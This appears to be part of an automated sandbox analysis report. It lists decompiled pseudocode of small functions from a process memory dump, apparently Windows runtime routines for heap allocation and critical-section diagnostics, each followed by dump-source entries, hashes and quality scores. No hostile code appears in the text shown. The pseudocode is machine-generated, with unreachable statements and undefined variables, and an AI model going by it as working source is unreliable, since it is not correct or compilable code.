                                        							L5:
                                        							__eflags =  *0x5488724 & 0x00000004;
                                        							if(( *0x5488724 & 0x00000004) == 0) {
                                        								asm("int3");
                                        								return _t3;
                                        							}
                                        						} else {
                                        							_t3 =  *0x7ffe02d4 & 0x00000003;
                                        							__eflags = _t3 - 3;
                                        							if(_t3 == 3) {
                                        								goto L5;
                                        							}
                                        						}
                                        					}
                                        					return _t3;
                                        				} else {
                                        					_t7 =  *0x5488724; // 0x0
                                        					return E05448DF1(__ebx, 0xc0000374, 0x5485890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
                                        				}
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5b8b6fe7c62b57e3b4c5c6c260b55ef6ba87ce1930aa1edc407dc11256661e0f
                                        • Instruction ID: 7f6d6a750f391d79cf3b4afe2619a443c8fd5c6378646cf18de8f4260267be78
                                        • Opcode Fuzzy Hash: 5b8b6fe7c62b57e3b4c5c6c260b55ef6ba87ce1930aa1edc407dc11256661e0f
                                        • Instruction Fuzzy Hash: 50F02E7E52B58457DE3A5B2524057F67FA2E745520F4908CBED5227302C9744443CA10
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 54%
                                        			E053D927A(void* __ecx) {
                                        				signed int _t11;
                                        				void* _t14;
                                        
                                        				_t11 = L053B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
                                        				if(_t11 != 0) {
                                        					E053DFA60(_t11, 0, 0x98);
                                        					asm("movsd");
                                        					asm("movsd");
                                        					asm("movsd");
                                        					asm("movsd");
                                        					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
                                        					 *((intOrPtr*)(_t11 + 0x24)) = 1;
                                        					E053D92C6(_t11, _t14);
                                        				}
                                        				return _t11;
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                        • Instruction ID: bddd59259a9406528068faf0f45a999bf8b90087c31d9eb01d0ce07844a52a71
                                        • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                        • Instruction Fuzzy Hash: 7BE09B337405406BE7119E55DCC4F57777DEF82721F044079B5055E242C6E6DD0987B4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 88%
                                        			E053B746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
                                        				signed int _t8;
                                        				void* _t10;
                                        				short* _t17;
                                        				void* _t19;
                                        				intOrPtr _t20;
                                        				void* _t21;
                                        
                                        				_t20 = __esi;
                                        				_t19 = __edi;
                                        				_t17 = __ebx;
                                        				if( *((char*)(_t21 - 0x25)) != 0) {
                                        					if(__ecx == 0) {
                                        						E053AEB70(__ecx, 0x54879a0);
                                        					} else {
                                        						asm("lock xadd [ecx], eax");
                                        						if((_t8 | 0xffffffff) == 0) {
                                        							_push( *((intOrPtr*)(__ecx + 4)));
                                        							E053D95D0();
                                        							L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
                                        							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
                                        							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
                                        						}
                                        					}
                                        					L10:
                                        				}
                                        				_t10 = _t19 + _t19;
                                        				if(_t20 >= _t10) {
                                        					if(_t19 != 0) {
                                        						 *_t17 = 0;
                                        						return 0;
                                        					}
                                        				}
                                        				return _t10;
                                        				goto L10;
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8d42a21fe9df7993b48c0beda41ea3465cd1a643b1e6b3effc127f336c815c55
                                        • Instruction ID: 9aed1bbb832114d977858b7e79a581720429394bcad88f403edb78c24dc2f289
                                        • Opcode Fuzzy Hash: 8d42a21fe9df7993b48c0beda41ea3465cd1a643b1e6b3effc127f336c815c55
                                        • Instruction Fuzzy Hash: 5DF0B435608144AAEF01D768C840FFABB76FF84251F140255DA62AB950E7E598118786
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 36%
                                        			E05468CD6(intOrPtr __ecx) {
                                        				signed int _v8;
                                        				intOrPtr _v12;
                                        				short _v38;
                                        				char _v44;
                                        				signed char* _t11;
                                        				intOrPtr _t17;
                                        				intOrPtr _t22;
                                        				intOrPtr _t23;
                                        				intOrPtr _t24;
                                        				signed int _t25;
                                        
                                        				_v8 =  *0x548d360 ^ _t25;
                                        				_v12 = __ecx;
                                        				_v38 = 0x1c2d;
                                        				if(E053B7D50() == 0) {
                                        					_t11 = 0x7ffe0386;
                                        				} else {
                                        					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                        				}
                                        				_push( &_v44);
                                        				_push(0xffffffe4);
                                        				_push(0x402);
                                        				_push( *_t11 & 0x000000ff);
                                        				return E053DB640(E053D9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5671ae9c6cfe20a0af0bcf18df0c61f61588a553501cae657cb57ca1d91d0ad3
                                        • Instruction ID: 916c0fedb1bffc90fbd696a17443095ef2994819728db90fb6a15f0027614612
                                        • Opcode Fuzzy Hash: 5671ae9c6cfe20a0af0bcf18df0c61f61588a553501cae657cb57ca1d91d0ad3
                                        • Instruction Fuzzy Hash: 79F08971A051089FDB04DBB8E945EAEB7B4EF49200F100199F515EB3C0D934D900C765
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E05394F2E(void* __ecx, char _a4) {
                                        				void* __esi;
                                        				void* __ebp;
                                        				void* _t17;
                                        				void* _t19;
                                        				void* _t20;
                                        				void* _t21;
                                        
                                        				_t18 = __ecx;
                                        				_t21 = __ecx;
                                        				if(__ecx == 0) {
                                        					L6:
                                        					__eflags = _a4;
                                        					if(__eflags != 0) {
                                        						L8:
                                        						E054688F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                        						L9:
                                        						return 0;
                                        					}
                                        					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                        					if(__eflags != 0) {
                                        						goto L9;
                                        					}
                                        					goto L8;
                                        				}
                                        				_t18 = __ecx + 0x30;
                                        				if(E053BC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x5371030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                        					goto L6;
                                        				} else {
                                        					return 1;
                                        				}
                                        			}










                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 36%
                                        			E05468B58(intOrPtr __ecx) {
                                        				signed int _v8;
                                        				intOrPtr _v20;
                                        				short _v46;
                                        				char _v52;
                                        				signed char* _t11;
                                        				intOrPtr _t17;
                                        				intOrPtr _t22;
                                        				intOrPtr _t23;
                                        				intOrPtr _t24;
                                        				signed int _t25;
                                        
                                        				_v8 =  *0x548d360 ^ _t25;
                                        				_v20 = __ecx;
                                        				_v46 = 0x1c26;
                                        				if(E053B7D50() == 0) {
                                        					_t11 = 0x7ffe0386;
                                        				} else {
                                        					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                        				}
                                        				_push( &_v52);
                                        				_push(4);
                                        				_push(0x402);
                                        				_push( *_t11 & 0x000000ff);
                                        				return E053DB640(E053D9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                        			}














                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E053CA44B(signed int __ecx) {
                                        				intOrPtr _t13;
                                        				signed int _t15;
                                        				signed int* _t16;
                                        				signed int* _t17;
                                        
                                        				_t13 =  *0x5487b9c; // 0x0
                                        				_t15 = __ecx;
                                        				_t16 = L053B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
                                        				if(_t16 == 0) {
                                        					return 0;
                                        				}
                                        				 *_t16 = _t15;
                                        				_t17 =  &(_t16[2]);
                                        				E053DFA60(_t17, 0, _t15 << 2);
                                        				return _t17;
                                        			}








                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 79%
                                        			E0539F358(void* __ecx, signed int __edx) {
                                        				char _v8;
                                        				signed int _t9;
                                        				void* _t20;
                                        
                                        				_push(__ecx);
                                        				_t9 = 2;
                                        				_t20 = 0;
                                        				if(E053CF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
                                        					_t20 = L053B4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                        				}
                                        				return _t20;
                                        			}







                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E053AFF60(intOrPtr _a4) {
                                        				void* __ecx;
                                        				void* __ebp;
                                        				void* _t13;
                                        				intOrPtr _t14;
                                        				void* _t15;
                                        				void* _t16;
                                        				void* _t17;
                                        
                                        				_t14 = _a4;
                                        				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x53711a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                        					return E054688F5(_t13, _t14, _t15, _t16, _t17, __eflags);
                                        				} else {
                                        					return E053B0050(_t14);
                                        				}
                                        			}











                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 82%
                                        			E054241E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                        				void* _t5;
                                        				void* _t14;
                                        
                                        				_push(8);
                                        				_push(0x54708f0);
                                        				_t5 = E053ED08C(__ebx, __edi, __esi);
                                        				if( *0x54887ec == 0) {
                                        					E053AEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                        					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
                                        					if( *0x54887ec == 0) {
                                        						 *0x54887f0 = 0x54887ec;
                                        						 *0x54887ec = 0x54887ec;
                                        						 *0x54887e8 = 0x54887e4;
                                        						 *0x54887e4 = 0x54887e4;
                                        					}
                                        					 *(_t14 - 4) = 0xfffffffe;
                                        					_t5 = L05424248();
                                        				}
                                        				return E053ED0D1(_t5);
                                        			}






                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0544D380(void* __ecx, void* __edx, intOrPtr _a4) {
                                        				void* _t5;
                                        
                                        				if(_a4 != 0) {
                                        					_t5 = L0539E8B0(__ecx, _a4, 0xfff);
                                        					L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                        					return _t5;
                                        				}
                                        				return 0xc000000d;
                                        			}





                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E053CA185() {
                                        				void* __ecx;
                                        				intOrPtr* _t5;
                                        
                                        				if( *0x54867e4 >= 0xa) {
                                        					if(_t5 < 0x5486800 || _t5 >= 0x5486900) {
                                        						return L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
                                        					} else {
                                        						goto L1;
                                        					}
                                        				} else {
                                        					L1:
                                        					return E053B0010(0x54867e0, _t5);
                                        				}
                                        			}






                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E053C16E0(void* __edx, void* __eflags) {
                                        				void* __ecx;
                                        				void* _t3;
                                        
                                        				_t3 = E053C1710(0x54867e0);
                                        				if(_t3 == 0) {
                                        					_t6 =  *[fs:0x30];
                                        					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
                                        						goto L1;
                                        					} else {
                                        						return L053B4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
                                        					}
                                        				} else {
                                        					L1:
                                        					return _t3;
                                        				}
                                        			}






                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E053C35A1(void* __eax, void* __ebx, void* __ecx) {
                                        				void* _t6;
                                        				void* _t10;
                                        				void* _t11;
                                        
                                        				_t10 = __ecx;
                                        				_t6 = __eax;
                                        				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
                                        					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
                                        				}
                                        				if( *((char*)(_t11 - 0x1a)) != 0) {
                                        					return E053AEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                        				}
                                        				return _t6;
                                        			}







                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E053AAAB0() {
                                        				intOrPtr* _t4;
                                        
                                        				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                        				if(_t4 != 0) {
                                        					if( *_t4 == 0) {
                                        						goto L1;
                                        					} else {
                                        						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
                                        					}
                                        				} else {
                                        					L1:
                                        					return 0x7ffe0030;
                                        				}
                                        			}





                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0541A537(intOrPtr _a4, intOrPtr _a8) {
                                        
                                        				return L053B8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
                                        			}




                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                        • Instruction ID: aafc7f4106ec791d212bea1f967fa665b88a47562f1b853855ad4bfbf6179dfc
                                        • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                        • Instruction Fuzzy Hash: 4DC01232280248BBCB126E81CC01F46BB2AEB94B60F008010BA080B9608672E970EA84
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0539DB40() {
                                        				signed int* _t3;
                                        				void* _t5;
                                        
                                        				_t3 = L053B4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
                                        				if(_t3 == 0) {
                                        					return 0;
                                        				} else {
                                        					 *_t3 =  *_t3 | 0x00000400;
                                        					return _t3;
                                        				}
                                        			}






                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                        • Instruction ID: 2544438a4c5bb3913ac0101945bc190d06ddc8a7d6069290919f3c6e2626f557
                                        • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                        • Instruction Fuzzy Hash: 90C08C70390A00AAEF261F20CD02B4036A1BB00B01F4404A06301DA4F0DBBCD801E600
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0539AD30(intOrPtr _a4) {
                                        
                                        				return L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                        			}




                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                        • Instruction ID: 9a1de582288f14f695d644dd49bbc1669bca63ca28aec6339a437df8424b83ea
                                        • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                        • Instruction Fuzzy Hash: 79C08C32180288BBC7126A45CD01F117B29E790B60F000020B6044AA618972E861D588
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E053B3A1C(intOrPtr _a4) {
                                        				void* _t5;
                                        
                                        				return L053B4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                        			}





                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                        • Instruction ID: 1282c27950cddcb97e71fc956ad9ec27dbad0419de6038842ed8098d9f838cb6
                                        • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                        • Instruction Fuzzy Hash: 8AC02B33180248BBCB126F41DC00F017F2EE790B60F000020F7040B971C576EC60D58C
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E053A76E2(void* __ecx) {
                                        				void* _t5;
                                        
                                        				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
                                        					return L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                        				}
                                        				return _t5;
                                        			}





                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                        • Instruction ID: e8f24d716c01cd67fde1cbdad22b750e212da32db827333a54f50fda739bf9df
                                        • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                        • Instruction Fuzzy Hash: 14C08C722411C05AEB2A5708CE65F303650FB88708F48019CAA024D8B1C3E8A803C308
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E053C36CC(void* __ecx) {
                                        
                                        				if(__ecx > 0x7fffffff) {
                                        					return 0;
                                        				} else {
                                        					return L053B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                        				}
                                        			}




                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                        • Instruction ID: e7c181bb637c172bb56712aa386228cdf75cdeb76e2d8206b3fe788807608bd3
                                        • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                        • Instruction Fuzzy Hash: A1C02B70351440BBEB151F30CD40F147254F700A21F6407987320458F0D5AC9C00D204
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E053B7D50() {
                                        				intOrPtr* _t3;
                                        
                                        				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                        				if(_t3 != 0) {
                                        					return  *_t3;
                                        				} else {
                                        					return _t3;
                                        				}
                                        			}





                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                        • Instruction ID: 9b2bac15e89e31b0a1e8f169be502c708f11097548c5ac665b34a36f7b77a049
                                        • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                        • Instruction Fuzzy Hash: 8AB092343019408FDF16DF18C080F6533E4FB84A80B8400D8E400CBA20D269E8008A00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 53%
                                        			E0542FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                        				void* _t7;
                                        				intOrPtr _t9;
                                        				intOrPtr _t10;
                                        				intOrPtr* _t12;
                                        				intOrPtr* _t13;
                                        				intOrPtr _t14;
                                        				intOrPtr* _t15;
                                        
                                        				_t13 = __edx;
                                        				_push(_a4);
                                        				_t14 =  *[fs:0x18];
                                        				_t15 = _t12;
                                        				_t7 = E053DCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                        				_push(_t13);
                                        				E05425720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                        				_t9 =  *_t15;
                                        				if(_t9 == 0xffffffff) {
                                        					_t10 = 0;
                                        				} else {
                                        					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                        				}
                                        				_push(_t10);
                                        				_push(_t15);
                                        				_push( *((intOrPtr*)(_t15 + 0xc)));
                                        				_push( *((intOrPtr*)(_t14 + 0x24)));
                                        				return E05425720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                        			}











                                        APIs
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0542FDFA
                                        Strings
                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0542FE2B
                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0542FE01
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                        • API String ID: 885266447-3903918235
                                        • Opcode ID: 19bc4cf8ec246f2cd9bb25802097a8ec8b0f4236e38b5aae1fa8e90949166b16
                                        • Instruction ID: 474548063a88f483c06577c21d9548c1b2070a1b509c67263b8c943c038deacd
                                        • Opcode Fuzzy Hash: 19bc4cf8ec246f2cd9bb25802097a8ec8b0f4236e38b5aae1fa8e90949166b16
                                        • Instruction Fuzzy Hash: CEF0F676240221BFD7252A45DC06FB3BB6AEB84730F540315F6285A1D1DA62FC3096F0
                                        Uniqueness

                                        Uniqueness Score: -1.00%